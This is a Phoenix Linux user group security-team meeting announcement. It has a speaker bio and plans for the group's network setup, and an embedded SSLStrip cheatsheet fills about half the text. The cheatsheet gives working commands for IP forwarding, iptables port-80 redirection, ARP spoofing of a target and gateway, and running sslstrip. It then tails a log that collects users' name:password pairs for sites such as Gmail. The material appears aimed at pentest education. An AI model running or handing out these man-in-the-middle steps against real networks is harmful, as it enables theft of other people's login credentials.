Next PLUG Security Team Saturday Noon - 15:00 Gangplankhq.com http://plug.phoenix.az.us
David Huerta will be showcasing hayst.ac - his Firefox Security Plugin; but one of the many Haystack Projects:
http://en.wikipedia.org/wiki/Haystack_%28MIT_project%29#External_links
After arriving in Arizona from the posh, cosmopolitan enclave of southeastern Idaho, David founded the DeVry Linux User Group (DeLUG) in 2003, an originally student organization that drew members and activities from the greater West Valley Free software community, including students at GCC and ASU West. He is also the founder of Hayst.ac, a web history obfuscation system, and serves on the board of directors for HeatSync Labs, a hackerspace in Chandler.
PLUG-TREK "Our 12 year mission... to Identify, architect and traverse OSI layer 0-8 security;
use modern professional test methodology tools from forensics to
pentesting. Transcend systems administration to reverse engineering,
forensic fuzzing, earnest exploits and claim a bugtraq accolade
or two... Da da, da, da, da, da dum...muzak..."
Behind the scenes: Cisco WPA2-Enterprise network setup.
Planning for Hamaci/LogMeIn HackFests
Rebuild old Linux system (with radius for enterprise-WPA2) into gPXE for imaging (Just like we did for Installfest):
http://www.ardyans.co.cc/ltsp-with-ubuntu-10-04.htm
http://www.ardyans.co.cc/how-to-make-a-gpxe-for-booting-client.htm
Add a puppet cfengine process to maintain our configuration files even after edited.
Just Like Farengi - We Like to BE PREPARED:
# SSLStrip CHEATSHEET
OVERVIEW:
Requirements
* Python >= 2.4 (apt-get install python)
* The python "twisted-web" module (apt-get install twisted-web)
Setup
* tar zxvf sslstrip-0.5.tar.gz
* cd sslstrip-0.5
* (optional) sudo python ./setup.py install
Running sslstrip
* Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
* Setup iptables to redirect HTTP traffic to sslstrip.
(iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
* Run sslstrip. (sslstrip.py -l <listenPort>)
* Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
Thanks to Moxie MarlinSpike
https://www.blackhat.com/html/bh-dc-09/bh-dc-09-speakers.html#Marlinspike
STEP X STEP (for those who need it slower):
# Proxy Preparation
* First verify routing and nat;
# cat /proc/sys/net/ipv4/ip_forward
* 0
# echo 1 > /proc/sys/net/ipv4/ip_forward
# cat /proc/sys/net/ipv4/ip_forward
* 1
# /sbin/iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
# Start MITM
* Arpspoof addresses to default interface gateway (and target machine)
# arpspoof –i eth0 –t 192.168.1.231 192.168.1.244
# SSL Strip
* Start SSLStrip:
# ./sslstrip –l 8080
* Open Browser - Go Login to SSL https://Gmail.com (for instance)
# tail –f sslstrip.log
You will log the name:password pairs for each site visited from the proxy.
As you can see, the default gateway and target machine can be seasoned to taste.
./sslstrip -h
------------------------------------end SHEETCHEAT
http://www.obnosis.com
Catch My MetaSploit & IP CAM Surveillance
Presentations @ ABLEConf.com in April!